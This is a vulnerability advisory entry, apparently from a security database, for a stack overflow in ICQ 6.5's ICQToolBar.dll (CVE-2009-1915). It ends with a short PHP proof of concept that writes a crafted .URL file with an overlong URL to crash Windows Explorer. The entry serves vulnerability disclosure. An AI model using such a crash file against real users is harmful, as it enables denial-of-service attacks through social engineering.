Lucene search
RootSSV:11538HistoryJun 06, 2009 - 12:00 a.m.
ICQ ICQToolBar.dll库栈溢出漏洞
2009-06-0600:00:00
Root
www.seebug.org
11
0.057 Low
EPSS
Percentile
93.3%
BUGTRAQ ID: 35150
CVE(CAN) ID: CVE-2009-1915
ICQ是一款流行的即时通讯聊天工具。
ICQ的URL搜索钩子(ICQToolBar.dll)中存在栈溢出漏洞。如果用户受骗跟随了包含有超长URL参数的Internet快捷方式.URL文件的话,就可以触发这个溢出,导致资源管理器崩溃。
AOL ICQ 6.5
厂商补丁:
AOL
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.icq.com/” target=“_blank”>http://www.icq.com/</a>
<?php
/*
$____x = "[InternetShortcut]\x0d\x0a".
"URL=".str_repeat("\x61",2184);
file_put_contents("9sg_poc.url",$____x);
?>
Related
prion
prion
Stack overflow
2009-06-04 17:30:00
kaspersky
kaspersky
KLA10214 DoS vulnerability in ICQ
2009-06-04 00:00:00
nvd
nvd
CVE-2009-1915
2009-06-04 17:30:00
cve
cve
CVE-2009-1915
2009-06-04 17:30:00
cvelist
cvelist
CVE-2009-1915
2009-06-04 17:00:00
openvas
openvas
ICQ 'ICQToolBar.dll' Buffer Overflow Vulnerability
2009-06-09 00:00:00
ICQ 'ICQToolBar.dll' Buffer Overflow Vulnerability
2009-06-09 00:00:00